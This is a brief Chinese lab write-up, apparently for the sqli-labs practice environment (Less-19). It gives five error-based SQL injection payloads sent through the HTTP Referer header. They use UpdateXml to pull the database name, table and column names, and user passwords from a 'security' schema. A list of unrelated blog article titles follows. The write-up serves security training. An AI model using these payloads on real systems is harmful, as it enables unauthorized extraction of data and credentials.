这个和less18一样,都是基于header的注入

这次的字段是referer

Referer: ' AND UpdateXml(1,concat(0x7e,database(),0x7e),1),1)#

Referer: 123' AND UpdateXml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1),1)#

Referer: 123' AND UpdateXml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x7e),1),1)#

Referer: 123' AND UpdateXml(1,concat(0x7e,(select username from security.users limit 0,1),0x7e),1),1)#

Referer: 123' AND UpdateXml(1,concat(0x7e,(select password from security.users limit 0,1),0x7e),1),1)#

最新文章

  1. 数据绑定控件之Repeater
  2. Atitit paip.对象方法的实现原理与本质.txt
  3. SQL Group By/Having
  4. 通达OA 公共文件柜二次开发添加管理信息(图文)
  5. 生命周期-初识IOS
  6. JVM(三)内存回收(一)
  7. 基于 Hexo + GitHub Pages 搭建个人博客(一)
  8. Redis学习——Windows环境下Redis的安装(二)
  9. Redis Index
  10. How to Build a New Habit: This is Your Strategy Guide
  11. JS变量声明方式
  12. Python开发 基礎知識 (未完代補)
  13. 深入理解JVM(四)JVM性能监控与故障处理工具
  14. [Big Data - Kafka] Kafka设计解析(三):Kafka High Availability (下)
  15. Redis的相关问题总结
  16. [Web 前端] this作用域问题
  17. 170814、Java使用gzip压缩文件、还原文件
  18. python3.4学习笔记(二十三) Python调用淘宝IP库获取IP归属地返回省市运营商实例代码
  19. 如何在64位WIN7旗舰版下安装SQL2000
  20. python接口自动化26-参数关联和JSESSIONID(上个接口返回数据作为下个接口请求参数)

热门文章

  1. extjs 4 chart 时间轴格式的处理
  2. 2.3. Configuring sudo Access-RedHat
  3. UIView 的图层关系
  4. springmvc学习笔记(10)-springmvc注解开发之商品改动功能
  5. Android 高亮指示层提示
  6. mysql20170404代码实现
  7. C++虚函数默认实参的注意事项
  8. Spring:延迟初始化
  9. 生活的 tricks
  10. B1295 [SCOI2009]最长距离 最短路